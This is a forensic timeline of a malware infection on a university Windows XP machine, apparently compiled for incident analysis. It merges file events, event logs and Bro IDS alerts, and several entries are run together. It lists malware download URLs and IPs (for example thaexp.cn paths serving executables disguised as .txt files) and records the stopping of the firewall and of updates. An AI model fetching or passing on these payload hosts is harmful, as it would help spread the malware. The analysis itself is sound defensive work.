02/19/09 10:03:00 accessed em[1].txt C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\X5RWIZXC\em[1].txt Text Document * Executable File, Archive, Not Indexed
02/19/09 10:03:00 modified 145.tmp C:\\WINDOWS\SYSTEM32\145.tmp Windows Temporary Windows * Executable File, Archive
02/19/09 10:03:00 modified em[1].txt C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\X5RWIZXC\em[1].txt Text Document * Executable File, Archive, Not Indexed
02/19/09 10:03:00 written 145.tmp C:\\WINDOWS\SYSTEM32\145.tmp Windows Temporary Windows * Executable File, Archive
02/19/09 10:03:00 written CcEvtSvc.exe C:\\WINDOWS\SYSTEM32\CcEvtSvc.exe Windows Executable Code\Executable Match File, Archive
02/19/09 10:03:00 written em[1].txt C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\X5RWIZXC\em[1].txt Text Document * Executable File, Archive, Not Indexed
02/19/09 10:03:01 bro no=HTTP_Malware na=NOTICE_EMAIL es=node00.0 sa=164.107.xxx.177 sp=2293/tcp da=211.95.79.6 dp=80/tcp method=GET url=http://thaexp.cn/met/ge.txt msg=164.107.xxx.177\ ->\ c83e4a32d0f6b2233b43ed3596766627\ http://thaexp.cn/met/ge.txt\ (hashed\ from\ the\ Team\ Cymru\ malware\ hash\ registry) sub=c83e4a32d0f6b2233b43ed3596766627 tag=@83-10576-604365
02/19/09 10:03:02 bro 209.205.196.18 GET http://209.205.196.18/em.txt
02/19/09 10:03:02 bro no=ConnectionWithSpamHausDropNet na=NOTICE_ALARM_ALWAYS es=node00.0 sa=164.107.xxx.177 sp=2295/tcp da=209.205.196.18 dp=80/tcp msg=164.107.xxx.177\ had\ a\ connection\ with\ a\ SpamHaus\ DROP\ list\ host tag=@83-10576-60451c
02/19/09 10:03:02 bro application/x-dosexec GET http://209.205.196.18/em.txt
02/19/09 10:03:02 bro no=HTTP_IncorrectFileType na=NOTICE_ALARM_ALWAYS es=node00.0 sa=164.107.xxx.177 sp=2295/tcp da=209.205.196.18 dp=80/tcp method=GET url=http://209.205.196.18/em.txt msg=application/x-dosexec\ GET\ http://209.205.196.18/em.txt tag=@83-10576-60451c
02/19/09 10:03:04 created CcEvtSvc.exe C:\\WINDOWS\SYSTEM32\CcEvtSvc.exe Windows Executable Code\Executable Match File, Archive
02/19/09 10:03:09 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the stopped state. -
02/19/09 10:03:09 modified CcEvtSvc.exe C:\\WINDOWS\SYSTEM32\CcEvtSvc.exe Windows Executable Code\Executable Match File, Archive
02/19/09 10:03:10 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Application Layer Gateway Service service entered the stopped state. -
02/19/09 10:03:10 the firewall has stopped, the CcEvtSvc service starts...
02/19/09 10:03:10 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Windows Firewall/Internet Connection Sharing (ICS) service entered the stopped state. -
02/19/09 10:03:10 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The Windows Firewall/Internet Connection Sharing (ICS) service was successfully sent a stop control. -
02/19/09 10:03:13 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The CcEvtSvc service was successfully sent a start control. -
02/19/09 10:03:13 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The CcEvtSvc service entered the running state. -
02/19/09 10:03:14 created abb[1].txt C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\QXLU2P44\abb[1].txt Text Document * Executable File, Archive, Not Indexed
02/19/09 10:03:14 created services.exe C:\\WINDOWS\services.exe Windows Executable Code\Executable Match File, Archive
02/19/09 10:03:14 modified netsh.exe C:\\WINDOWS\SYSTEM32\netsh.exe Windows Executable Code\Executable File, Archive
02/19/09 10:03:16 accessed abb[1].txt C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\QXLU2P44\abb[1].txt Text Document * Executable File, Archive, Not Indexed
02/19/09 10:03:16 modified abb[1].txt C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\QXLU2P44\abb[1].txt Text Document * Executable File, Archive, Not Indexed
02/19/09 10:03:16 written abb[1].txt C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\QXLU2P44\abb[1].txt Text Document * Executable File, Archive, Not Indexed
02/19/09 10:03:17 bro application/x-dosexec GET http://thaexp.cn/dll/abb.txt
02/19/09 10:03:17 bro no=HTTP_IncorrectFileType na=NOTICE_ALARM_ALWAYS es=node00.0 sa=164.107.xxx.177 sp=2293/tcp da=211.95.79.6 dp=80/tcp method=GET url=http://thaexp.cn/dll/abb.txt msg=application/x-dosexec\ GET\ http://thaexp.cn/dll/abb.txt tag=@83-10576-604365
02/19/09 10:03:17 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service was successfully sent a start control. -
02/19/09 10:03:17 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the running state. -
02/19/09 10:03:17 created 147.tmp C:\\WINDOWS\SYSTEM32\147.tmp Windows Temporary Windows * Executable File, Archive
02/19/09 10:03:17 created reader_s.exe C:\\WINDOWS\SYSTEM32\reader_s.exe Windows Executable Code\Executable Match File, Archive
02/19/09 10:03:17 written reader_s.exe C:\\WINDOWS\SYSTEM32\reader_s.exe Windows Executable Code\Executable Match File, Archive
02/19/09 10:03:18 created reader_s.exe C:\\Documents and Settings\smith.99999\reader_s.exe Windows Executable Code\Executable Match File, Archive
02/19/09 10:03:18 written reader_s.exe C:\\Documents and Settings\smith.99999\reader_s.exe Windows Executable Code\Executable Match File, Archive
02/19/09 10:03:23 created al[1].txt C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\0BSM01W8\al[1].txt Text Document * Executable File, Archive, Not Indexed
02/19/09 10:03:24 accessed al[1].txt C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\0BSM01W8\al[1].txt Text Document * Executable File, Archive, Not Indexed
02/19/09 10:03:24 created 148.tmp C:\\WINDOWS\SYSTEM32\148.tmp Windows Temporary Windows * Executable File, Archive
02/19/09 10:03:24 created index[1] C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\KVVYP711\index[1] * Executable File, Archive, Not Indexed
02/19/09 10:03:24 modified 147.tmp C:\\WINDOWS\SYSTEM32\147.tmp Windows Temporary Windows * Executable File, Archive
02/19/09 10:03:24 modified al[1].txt C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\0BSM01W8\al[1].txt Text Document * Executable File, Archive, Not Indexed
02/19/09 10:03:24 written 147.tmp C:\\WINDOWS\SYSTEM32\147.tmp Windows Temporary Windows * Executable File, Archive
02/19/09 10:03:24 written al[1].txt C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\0BSM01W8\al[1].txt Text Document * Executable File, Archive, Not Indexed
02/19/09 10:03:25 accessed index[1] C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\KVVYP711\index[1] * Executable File, Archive, Not Indexed
02/19/09 10:03:25 created doc[1].txt C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\KVVYP711\doc[1].txt Text Document * Executable File, Archive, Not Indexed
02/19/09 10:03:25 created pydesepr.dll C:\\WINDOWS\SYSTEM32\pydesepr.dll Dynamic Link Library Code\Library Match File, Archive
02/19/09 10:03:25 modified index[1] C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\KVVYP711\index[1] * Executable File, Archive, Not Indexed
02/19/09 10:03:25 written index[1] C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\KVVYP711\index[1] * Executable File, Archive, Not Indexed
02/19/09 10:03:25 written jdfjpl.dll C:\\WINDOWS\SYSTEM32\jdfjpl.dll Dynamic Link Library Code\Library Match File, Archive
02/19/09 10:03:25 written pydesepr.dll C:\\WINDOWS\SYSTEM32\pydesepr.dll Dynamic Link Library Code\Library Match File, Archive
02/19/09 10:03:26 bro application/x-dosexec GET http://thaexp.cn/dll/al.txt
02/19/09 10:03:26 bro no=HTTP_IncorrectFileType na=NOTICE_ALARM_ALWAYS es=node00.0 sa=164.107.xxx.177 sp=2293/tcp da=211.95.79.6 dp=80/tcp method=GET url=http://thaexp.cn/dll/al.txt msg=application/x-dosexec\ GET\ http://thaexp.cn/dll/al.txt tag=@83-10576-604365
02/19/09 10:03:26 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the stopped state. -
02/19/09 10:03:26 modified jdfjpl.dll C:\\WINDOWS\SYSTEM32\jdfjpl.dll Dynamic Link Library Code\Library Match File, Archive
02/19/09 10:03:26 modified pydesepr.dll C:\\WINDOWS\SYSTEM32\pydesepr.dll Dynamic Link Library Code\Library Match File, Archive
02/19/09 10:03:27 bro application/x-dosexec GET http://85.17.169.55/forum/index.dll?setid=irq4&affid=177047&uid=2C211880FE9611DD818B177047CFFFFF&rid=pfobnf&guid=D294B3372EFC4D4CA6C6DDD12F79C20A
02/19/09 10:03:27 created jdfjpl.dll C:\\WINDOWS\SYSTEM32\jdfjpl.dll Dynamic Link Library Code\Library Match File, Archive
02/19/09 10:03:28 bro MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit GET http://lorentil.cn/dok/doc.txt
02/19/09 10:03:30 automatic updates have been disabled...02/19/09 10:03:31 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-21-57765512-1263358170-1248344978-1385 COMPUTER: HACKEDPC DESCRIPTION: The Automatic Updates service was successfully sent a stop control. -02/19/09 10:03:39 accessed UNWISE.EXE C:\\Program Files\AWS\WeatherBug\UNWISE.EXE Windows Executable Code\Executable File, Archive02/19/09 10:03:39 modified UNWISE.EXE C:\\Program Files\AWS\WeatherBug\UNWISE.EXE Windows Executable Code\Executable File, Archive02/19/09 10:03:46 accessed WUAUCLT.EXE-1360D60A.pf C:\WINDOWS\Prefetch\WUAUCLT.EXE-1360D60A.pf02/19/09 10:03:46 written WUAUCLT.EXE-1360D60A.pf C:\WINDOWS\Prefetch\WUAUCLT.EXE-1360D60A.pf02/19/09 10:03:46 modified WUAUCLT.EXE-1360D60A.pf C:\WINDOWS\Prefetch\WUAUCLT.EXE-1360D60A.pf02/19/09 10:03:49 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Automatic Updates service entered the stopped state. 
-02/19/09 10:04:59 created system@coupons[1].txt coupons.com/ Cookies -02/19/09 10:05:06 created system@google[1].txt google.com/ Cookies -02/19/09 10:05:08 bro no=ProtocolFound na=NOTICE_FILE es=node03.1 sa=164.107.xxx.177 sp=2335/tcp da=216.195.58.113 dp=2085/tcp num=16 msg=164.107.xxx.177/2335\ >\ 216.195.58.113/2085\ Apache\ (via\ HTTP)\ on\ port\ 2085/tcp sub=Apache\ (via\ HTTP) tag=@83-10576-60837302/19/09 10:05:08 bro no=ProtocolFound na=NOTICE_FILE es=node04.1 sa=164.107.xxx.177 sp=2336/tcp da=216.195.62.100 dp=2084/tcp num=16 msg=164.107.xxx.177/2336\ >\ 216.195.62.100/2084\ Apache\ (via\ HTTP)\ on\ port\ 2084/tcp sub=Apache\ (via\ HTTP) tag=@83-10576-60837902/19/09 10:05:17 bro no=ProtocolFound na=NOTICE_FILE es=node07 sa=164.107.xxx.177 sp=2348/tcp da=216.195.57.253 dp=4658/tcp num=16 msg=164.107.xxx.177/2348\ >\ 216.195.57.253/4658\ Apache\ (via\ HTTP)\ on\ port\ 4658/tcp sub=Apache\ (via\ HTTP) tag=@83-10576-60852e02/19/09 10:05:28 created [email protected][2].txt m.webtrends.com/ Cookies -02/19/09 10:05:28 created [email protected][1].txt signup.live.com/ Cookies -02/19/09 10:05:28 created [email protected][2].txt www.upononjob.cn/ Cookies -02/19/09 10:05:31 modified msmsgs.exe C:\\Program Files\Messenger\msmsgs.exe Windows Executable Code\Executable File, Archive02/19/09 10:05:45 accessed [email protected][2].txt m.webtrends.com/ Cookies -02/19/09 10:05:57 created upd105320[1] C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\X5RWIZXC\upd105320[1] * Executable File, Archive, Not Indexed02/19/09 10:05:57 created vgyixcnu.dll C:\\WINDOWS\SYSTEM32\vgyixcnu.dll Dynamic Link Library Code\Library Match File, Archive02/19/09 10:05:58 accessed upd105320[1] C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\X5RWIZXC\upd105320[1] * Executable File, Archive, Not Indexed02/19/09 10:05:58 modified upd105320[1] C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet 
Files\Content.IE5\X5RWIZXC\upd105320[1] * Executable File, Archive, Not Indexed02/19/09 10:05:58 modified vgyixcnu.dll C:\\WINDOWS\SYSTEM32\vgyixcnu.dll Dynamic Link Library Code\Library Match File, Archive02/19/09 10:05:58 written upd105320[1] C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\X5RWIZXC\upd105320[1] * Executable File, Archive, Not Indexed02/19/09 10:05:58 written vgyixcnu.dll C:\\WINDOWS\SYSTEM32\vgyixcnu.dll Dynamic Link Library Code\Library Match File, Archive02/19/09 10:06:00 bro application/x-dosexec GET http://77.93.75.147/db/upd105320.dll?setid=irq4&affid=177047&uid=2C211880FE9611DD818B177047CFFFFF&guid=D294B3372EFC4D4CA6C6DDD12F79C20A&rid=pfobnf02/19/09 10:06:07 accessed doc[1].txt C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\KVVYP711\doc[1].txtText Document * Executable File, Archive, Not Indexed02/19/09 10:06:07 modified 148.tmp C:\\WINDOWS\SYSTEM32\148.tmp Windows Temporary Windows * Executable File, Archive02/19/09 10:06:07 modified doc[1].txt C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\KVVYP711\doc[1].txtText Document * Executable File, Archive, Not Indexed02/19/09 10:06:07 written 148.tmp C:\\WINDOWS\SYSTEM32\148.tmp Windows Temporary Windows * Executable File, Archive02/19/09 10:06:07 written doc[1].txt C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\KVVYP711\doc[1].txtText Document * Executable File, Archive, Not Indexed02/19/09 10:06:12 accessed lgsztotz.exe C:\\WINDOWS\lgsztotz.exe Windows Executable Code\Executable Match File, Archive02/19/09 10:06:12 created lgsztotz.exe C:\\WINDOWS\lgsztotz.exe Windows Executable Code\Executable Match File, Archive
02/19/09 10:06:12 created uncxiygv.ini C:\\WINDOWS\SYSTEM32\uncxiygv.ini Initialization Windows ! Bad signature File, Hidden, System
02/19/09 10:06:12 modified lgsztotz.exe C:\\WINDOWS\lgsztotz.exe Windows Executable Code\Executable Match File, Archive
02/19/09 10:06:12 written lgsztotz.exe C:\\WINDOWS\lgsztotz.exe Windows Executable Code\Executable Match File, Archive
02/19/09 10:06:19 accessed [email protected][2].txt www.upononjob.cn/ Cookies -
02/19/09 10:06:22 modified uncxiygv.ini C:\\WINDOWS\SYSTEM32\uncxiygv.ini Initialization Windows ! Bad signature File, Hidden, System
02/19/09 10:06:22 written uncxiygv.ini C:\\WINDOWS\SYSTEM32\uncxiygv.ini Initialization Windows ! Bad signature File, Hidden, System
02/19/09 10:16:11 system reboots (after a crash?)
02/19/09 10:16:12 logged SysEvent.Evt EVENT ID: 9 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: Broadcom 440x 10/100 Integrated Controller: Network controller configured for 100Mb full-duplex link. -
02/19/09 10:16:19 accessed SbClientManager.exe C:\\Program Files\SafeBoot\SbClientManager.exe Windows Executable Code\Executable File, Archive
02/19/09 10:16:19 accessed mdm.exe C:\\Program Files\Common Files\Microsoft Shared\VS7DEBUG\mdm.exe Windows Executable Code\Executable File, Archive
02/19/09 10:16:35 logged SysEvent.Evt EVENT ID: 6009 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: Microsoft (R) Windows (R) 5.01. 2600 Service Pack 3 Uniprocessor Free. -
02/19/09 10:16:35 logged SysEvent.Evt EVENT ID: 6005 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Event log service was started. -
02/19/09 10:16:36 logged SysEvent.Evt EVENT ID: 1001 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The computer has rebooted from a bugcheck. The bugcheck was:;0x1000007e (0xc0000005, 0x8239c12a, 0xb829aaf4, 0xb829a7f0).;A dump was saved in: C:\WINDOWS\Minidump\Mini021909-01.dmp. -
02/19/09 10:17:05 created ethqqaeg.sys C:\\WINDOWS\SYSTEM32\DRIVERS\ethqqaeg.sys Device Driver Code\Executable Match File, Archive
02/19/09 10:17:05 modified ethqqaeg.sys C:\\WINDOWS\SYSTEM32\DRIVERS\ethqqaeg.sys Device Driver Code\Executable Match File, Archive
02/19/09 10:17:05 written ethqqaeg.sys C:\\WINDOWS\SYSTEM32\DRIVERS\ethqqaeg.sys Device Driver Code\Executable Match File, Archive
02/19/09 10:17:11 modified SbClientManager.exe C:\\Program Files\SafeBoot\SbClientManager.exe Windows Executable Code\Executable File, Archive
02/19/09 10:17:19 bro no=ProtocolFound na=NOTICE_FILE es=node02.0 sa=164.107.xxx.177 sp=1049/tcp da=94.76.216.202 dp=9011/tcp num=16 msg=164.107.xxx.177/1049\ >\ 94.76.216.202/9011\ Apache\ (via\ HTTP)\ on\ port\ 9011/tcp sub=Apache\ (via\ HTTP) tag=@83-10576-61d02b
02/19/09 10:17:25 modified mdm.exe C:\\Program Files\Common Files\Microsoft Shared\VS7DEBUG\mdm.exe Windows Executable Code\Executable File, Archive
02/19/09 10:17:34 bro no=ProtocolFound na=NOTICE_FILE es=node02.0 sa=164.107.xxx.177 sp=1078/tcp da=94.76.216.202 dp=9011/tcp num=16 msg=164.107.xxx.177/1078\ >\ 94.76.216.202/9011\ Apache\ (via\ HTTP)\ on\ port\ 9011/tcp sub=Apache\ (via\ HTTP) tag=@83-10576-61d446
02/19/09 10:17:45 spam starts...
02/19/09 10:17:47 logged SysEvent.Evt EVENT ID: 11162 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The system failed to register host (A) resource records (RRs) for;network adapterwith settings:; Adapter Name : {A45FF4F5-BE0B-4156-B8E8-7CFCB02CE985}; Host Name : hackedpc; Primary Domain Suffix : ubw.ohio-state.edu; DNS server list :; 164.107.xxx.29, 128.146.1.7, 128.146.48.7; Sent update to server : 164.1.1.1; IP Address(es) :; 164.107.xxx.177;The reason the system could not register these RRs was because the;update request it sent to the DNS server timed out. The most likely;cause of this is that the DNS server authoritative for the name it;was attempting to register or update is not running at this time.;You can manually retry DNS registration of the network adapter and;its settings by typing "ipconfig /registerdns" at the command prompt.;If problems still persist, contact your DNS server or network systems;administrator. -
02/19/09 10:17:52 modified acrodist.exe C:\\Program Files\Adobe\Acrobat 7.0\Distillr\acrodist.exe Windows Executable Code\Executable File, Archive
02/19/09 10:17:52 modified fxssvc.exe C:\\WINDOWS\SYSTEM32\fxssvc.exe Windows Executable Code\Executable File, Archive
02/19/09 10:17:58 modified agent.exe C:\\Program Files\Common Files\InstallShield\UpdateService\agent.exe Windows Executable Code\Executable File, Archive
02/19/09 10:18:16 modified xccwinsys.ini C:\\WINDOWS\xccwinsys.ini Initialization Windows ! Bad signature File, Archive
02/19/09 10:18:16 written xccwinsys.ini C:\\WINDOWS\xccwinsys.ini Initialization Windows ! Bad signature File, Archive
02/19/09 10:18:52 huh...
02/19/09 10:18:53 logged SysEvent.Evt EVENT ID: 4226 EVENT TYPE: WARNING EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: TCP/IP has reached the security limit imposed on the number of concurrent TCP connect attempts. -
02/19/09 10:19:00 logged SysEvent.Evt EVENT ID: 10010 EVENT TYPE: ERROR EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The server {0002DF01-0000-0000-C000-000000000046} did not register with DCOM within the required timeout. -
02/19/09 10:19:14 modified dumprep.exe C:\\WINDOWS\SYSTEM32\dumprep.exe Windows Executable Code\Executable File, Archive
02/19/09 10:19:47 created system@atdmt[1].txt atdmt.com/ Cookies -
02/19/09 10:19:47 created system@google[1].txt google.com/ Cookies -
02/19/09 10:19:47 created system@live[2].txt live.com/ Cookies -
02/19/09 10:19:47 created [email protected][1].txt msnaccountservices.112.2o7.net/ Cookies -
02/19/09 10:19:47 created system@yahoo[1].txt yahoo.com/ Cookies -
02/19/09 10:19:47 created [email protected][1].txt 66.48.78.222/ron/ Cookies -
02/19/09 10:19:47 created [email protected][1].txt hotelinternetstrategies.122.2o7.net/ Cookies -
02/19/09 10:19:47 created smith.99999@lacasaquecanta[2].txt lacasaquecanta.com/ Cookies -
02/19/09 10:19:47 created smith.99999@weatherbug[1].txt weatherbug.com/ Cookies -
02/19/09 10:20:00 logged SysEvent.Evt EVENT ID: 7026 EVENT TYPE: ERROR EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The following boot-start or system-start driver(s) failed to load: ;irzylwcf;zmzfozjg -
02/19/09 10:20:00 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The Terminal Services service was successfully sent a start control. -
02/19/09 10:20:00 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The Remote Access Connection Manager service was successfully sent a start control. -
02/19/09 10:20:00 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Terminal Services service entered the running state. -
02/19/09 10:20:00 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service was successfully sent a start control. -
02/19/09 10:20:00 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The Network Location Awareness (NLA) service was successfully sent a start control. -
02/19/09 10:20:00 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The Network Connections service was successfully sent a start control. -
02/19/09 10:20:00 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the running state. -
02/19/09 10:20:00 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Network Location Awareness (NLA) service entered the running state. -
02/19/09 10:20:00 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Network Connections service entered the running state. -
02/19/09 10:20:00 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The SSDP Discovery Service service was successfully sent a start control. -
02/19/09 10:20:00 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the stopped state. -
02/19/09 10:20:00 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The SSDP Discovery Service service entered the running state. -
02/19/09 10:20:00 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Remote Access Connection Manager service entered the running state. -
02/19/09 10:20:04 bro no=ProtocolFound na=NOTICE_FILE es=node03.1 sa=164.107.xxx.177 sp=2482/tcp da=216.195.58.113 dp=2085/tcp num=16 msg=164.107.xxx.177/2482\ >\ 216.195.58.113/2085\ Apache\ (via\ HTTP)\ on\ port\ 2085/tcp sub=Apache\ (via\ HTTP) tag=@83-10576-6218f1
02/19/09 10:20:05 bro no=ProtocolFound na=NOTICE_FILE es=node04.1 sa=164.107.xxx.177 sp=2484/tcp da=216.195.62.100 dp=2084/tcp num=16 msg=164.107.xxx.177/2484\ >\ 216.195.62.100/2084\ Apache\ (via\ HTTP)\ on\ port\ 2084/tcp sub=Apache\ (via\ HTTP) tag=@83-10576-621967
02/19/09 10:20:27 modified userinit.exe C:\\WINDOWS\SYSTEM32\userinit.exe Windows Executable Code\Executable File, Archive
02/19/09 10:20:43 accessed ojaocbok.sys C:\\WINDOWS\SYSTEM32\DRIVERS\ojaocbok.sys Device Driver Code\Executable Match File, Archive
02/19/09 10:20:45 accessed phqghume.sys C:\\WINDOWS\SYSTEM32\DRIVERS\phqghume.sys Device Driver Code\Executable Match File, Archive
02/19/09 10:20:51 bro
02/19/09 10:20:58 logged SysEvent.Evt EVENT ID: 1003 EVENT TYPE: ERROR EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: Error code 1000007e, parameter1 c0000005, parameter2 8239c12a, parameter3 b829aaf4, parameter4 b829a7f0. -
02/19/09 10:20:59 modified dwwin.exe C:\\WINDOWS\SYSTEM32\dwwin.exe Windows Executable Code\Executable Match File, Archive
02/19/09 10:21:10 accessed index.dat http://pub.weatherbug.com/RealMedia/ads/adstream_sx.cgi/www.wbug.com/HM/17421@lb1?_RM_HTML_KEYWORDZ3_=43204&_RM_HTML_KEYWORDWO1_=21.20&_RM_HTML_KEYWORDL2_=Columbus&_RM_HTML_KEYWORDL3_=OH&_RM_HTML_KEYWORDHO1_=0.50&_RM_HTML_KEYWORDPC_=Z5264&A1=50500&A2=170&D1=2&D3=3&FC1=111&FC2=4&FC3=40&HO1=0.50&HO4=Mixed Trace.&L1=535&L2=Columbus&L3=OH&L4=23&N=506267455&Nav1=HM&Nav2=HM_Unknown&PC=Z5264&S2=&S3=0&SP1=&SP2=&SP5=-1&TW3=&UA1=506&WO1=21.20&WO3=0&WO4=58.00&Z3=43204& History\Daily -
02/19/09 10:21:13 bro application/x-dosexec GET http://thaexp.cn/dll/al.txt
02/19/09 10:21:13 bro no=HTTP_IncorrectFileType na=NOTICE_ALARM_ALWAYS es=node00.0 sa=164.107.xxx.177 sp=3425/tcp da=211.95.79.6 dp=80/tcp method=GET url=http://thaexp.cn/dll/al.txt msg=application/x-dosexec\ GET\ http://thaexp.cn/dll/al.txt tag=@83-10576-6237d8
02/19/09 10:21:17 accessed index.dat http://deskwx.weatherbug.com/WeatherWindow/WeatherWindow.html?lvl=0&zip=43204&con1=111&sunr=1235045940&suns=1235085120&ut=1235056857&stat=KTZR&L1=535&ver=6.07&camera_id=&ccamzip=<a=<at=<az=&sed=0&lpt=1235048003&rnd=12382&&&&vcw=452&lvw=1210334133&lvd=1209989319&dosp=0&UA1=506&UA5=506&zcode=Z5264&showgutsads=1&screen_x=1152&screen_y=804&lvr=&lvu=&wpt=&A2=170&lvh=&wat=1235055111&A1=50500&dsr=506&dsu=506&dssp=-1&dspm=-1&pmls=1234184569&D3=3&UA3=-1&UA11=&UA15=&L4=23&UA16=&ui=1&n=506267455&alid=0&u=&LRR=&L3=OH History\Daily -
02/19/09 10:21:22 accessed index.dat http://pub.weatherbug.com/RealMedia/ads/adstream_sx.cgi/www.wbug.com/HM/18716@lb1?_RM_HTML_KEYWORDZ3_=43204&_RM_HTML_KEYWORDWO1_=21.20&_RM_HTML_KEYWORDL2_=Columbus&_RM_HTML_KEYWORDL3_=OH&_RM_HTML_KEYWORDHO1_=0.50&_RM_HTML_KEYWORDPC_=Z5264&A1=50500&A2=170&D1=2&D3=3&FC1=111&FC2=4&FC3=40&HO1=0.50&HO4=Mixed Trace.&L1=535&L2=Columbus&L3=OH&L4=23&N=506267455&Nav1=HM&Nav2=HM_Unknown&PC=Z5264&S2=&S3=0&SP1=&SP2=&SP5=-1&TW3=&UA1=506&WO1=21.20&WO3=0&WO4=58.00&Z3=43204& History\Daily -
